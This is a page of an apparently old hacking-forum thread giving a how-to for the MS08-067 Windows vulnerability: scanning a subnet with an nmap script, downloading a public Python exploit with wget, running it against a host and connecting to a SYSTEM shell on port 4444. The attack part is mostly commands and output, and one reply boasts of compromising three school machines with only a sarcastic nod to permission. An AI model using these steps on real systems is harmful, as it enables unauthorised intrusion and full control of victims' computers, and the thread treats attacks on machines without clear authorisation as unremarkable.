Page 1 of 5 123 ... LastLast
Results 1 to 10 of 41

Thread: Playing with ms08_067

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Playing with ms08_067

    So since some other people have posted some stuff on this exploit I figured I'd see what I could add. The first really cool thing I found (Thanks Arkaic)
    was a script for nmap which checks for the vulnerability. If anyone is unfamiliar with the nmap scripting engine you are really missing out. Maybe if there is some demand we can do a write up on it later. So we need to check out a experimental branch on nmap in order to get the needed libraries for it to work. If your nmap breaks because of this its not my fault. Mine is fine so your should be as well. Ok here we go
    Code:
    b4cktr4ck3 / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron
    b4cktr4ck3 / # cd ron/nmap-smb
    b4cktr4ck3 nmap-smb # ./configure
    b4cktr4ck3 nmap-smb # make
    b4cktr4ck3 nmap-smb # make install
    Ok so all we did was rebuild nmap with a new branch. This actually gives us a bunch of new scripts to check out but for the sake of this post we will only use one. So now we can run a scan. The reason I searched this out is because the metasploit module to do the scan test (to my knowledge) only does one host at a time. I was looking to cover subnets if need be.

    Okay so lets run our new script...
    Code:
    b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse  -p 445 192.168.1.0/24 
    
    Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
    Interesting ports on firewall.localhost.com (192.168.1.1):
    PORT    STATE    SERVICE
    445/tcp filtered microsoft-ds
    MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
    
    Interesting ports on 192.168.1.127:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    
    Interesting ports on 192.168.1.128:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    MAC Address: 00:04:4B:18:69:8A (Nvidia)
    
    Interesting ports on 192.168.1.237:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:0C:29:4A:B6:6D (VMware)
    
    Host script results:
    |_ smb-check-vulns: This host is vulnerable to MS08-067
    
    Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
    As you can see we have a victim...er winner!

    So just so this post wont be so short and lame we can also go ahead and see if we can pop this box. For this trick I'll go to milw0rm and grab a recent .py sploit on the subject.
    Code:
    b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
    --13:45:35--  http://www.milw0rm.com/exploits/download/7132.py
               => `7132.py'
    Resolving www.milw0rm.com... 76.74.9.18
    Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/plain]
    
        [ <=>                              ] 7,085         --.--K/s             
    
    13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
    Ok so if you open up the exploit (which you should always do) and give it a quick read you will see there is a windows 2003 payload (#2) and a 2000 payload(#1) {thanks to TheX1le} so due to our scan results we are going to need 2003 so...
    Code:
    b4cktr4ck3 / # python 7132.py 192.168.1.237 2
    #######################################################################
    #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
    #   www.hackingspirits.com
    #   www.coffeeandsecurity.com
    #   Email: d3basis.m0hanty @ gmail.com
    #######################################################################
    
    [-]Windows 2003[SP2] payload loaded
    [-]Initiating connection
    [-]connected to ncacn_np:192.168.1.237[\pipe\browser]
    [-]Exploit sent to target successfully...
    [1]Telnet to port 4444 on target machine...
    cool seems we have successfully "poped" the box so lets see...
    Code:
    b4cktr4ck3 / # telnet 192.168.1.237 4444
    Trying 192.168.1.237...
    Connected to 192.168.1.237.
    Escape character is '^]'.
    Microsoft Windows [Version 5.2.3790]
    (C) Copyright 1985-2003 Microsoft Corp.
    
    C:\WINDOWS\system32>
    Very Nice!
    Code:
    C:\WINDOWS\system32>whoami
    whoami
    nt authority\system
    Well thats it for this post. If you found any of this info helpful please let me know and I will post more how to's on this type of thing otherwise just tell me I suck and I'll go back to moderating with a iron fist

  2. #2
    fastboi
    Guest

    Default

    however, i just used perl script, and got following.
    Code:
    bt ~ # python 7132.py 192.168.1.102 2
    #######################################################################
    #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
    #   www.hackingspirits.com
    #   www.coffeeandsecurity.com
    #   Email: d3basis.m0hanty @ gmail.com
    #######################################################################
    
    [-]Windows 2003[SP2] payload loaded
    [-]Initiating connection
    [-]connected to ncacn_np:192.168.1.102[\pipe\browser]
    [-]Exploit sent to target successfully...
    [1]Telnet to port 4444 on target machine...
    bt ~ # telnet 192.168.1.102 4444
    Trying 192.168.1.102...
    telnet: connect to address 192.168.1.102: Connection refused
    bt ~ #

    Its sp3 xp machine with required port open, but maybe because it is sp3, it is not working. Perl script could be more intelligent, and give a message, payload was not successful or something of that nature.

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    The exploit is only for windows server 2003 or 2000 which have not been patched in the last few months. The exploit is not mine. I merely used it to complete the post. Yes the error handling is pretty bad in the script but like I said I just borrowed it.

  4. #4
    fastboi
    Guest

    Default

    yeah i always miss things. 1 = win 2000, 2 = win 2003[sp2]. I got tricked by sp2... somehow i thought its win 2003 and xp sp2 compatible lol. Thanks anyway

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    5

    Thumbs up awesome! :)

    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because is prepared to more windows languages..

    btw, thanks, very nice post!

    cheers!

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Quote Originally Posted by thebug View Post
    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because is prepared to more windows languages..

    btw, thanks, very nice post!

    cheers!
    I would never use autopwn in a real test situation. Its far to noisy. Also the "old" nmap as you put it does not do what this nmap script does. The script checks the port and then reports whether its vulnerable or not.

  7. #7
    Just burned his ISO Lammer's Avatar
    Join Date
    Nov 2008
    Posts
    11

    Default Great!

    Very nice how-to pureh@te.
    I think this kind of info its very very usefull.
    Please keep sending them.

  8. #8
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    6

    Default

    I was able to successfully sploit 3 windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though

  9. #9
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by anonymoususer View Post
    I was able to successfully sploit 3 windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though
    With permission of course........



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  10. #10
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    tested on XP Box with SP3 and worked as well , just for info reading the paper about that exploit says will work if the system is not patched with the windows update KB958644

Page 1 of 5 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •